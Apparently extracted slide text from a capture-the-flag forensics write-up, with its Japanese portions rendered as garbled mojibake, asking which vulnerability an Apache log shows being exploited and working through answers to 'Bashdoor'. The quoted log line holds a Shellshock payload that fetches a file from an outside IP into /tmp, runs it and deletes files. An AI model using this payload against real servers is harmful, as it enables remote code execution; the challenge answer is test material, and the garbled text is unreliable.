ͲΜͳ͕͋ͬͨͷʔʁ
1 The Vuln:
What is the vulnerability that was
successfully exploited also "known" as?
4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔
Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ
XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/?
id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O /
tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http://
52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ;
rm -rf /tmp/*'"
Slide 9
Slide 9 text
1ͷ͑ʁ
What is the vulnerability that was successfully
exploited also "known" as?
ͳ͔ͳ͔͕͑߹Θͳ͍…
Shellshock?
shellshock?
Slide 10
Slide 10 text
1ͷ͑ʁ
What is the vulnerability that was successfully
exploited also "known" as?
ͳ͔ͳ͔͕͑߹Θͳ͍…
Shellshock?
shellshock?
Bashbug?
CVE-2014-6271?
Slide 11
Slide 11 text
1ͷ͑ʁ
What is the vulnerability that was successfully
exploited also "known" as?
ͳ͔ͳ͔͕͑߹Θͳ͍…
Shellshock?
shellshock?
Bashbug?
CVE-2014-6271?
͑ʮBashdoorʯ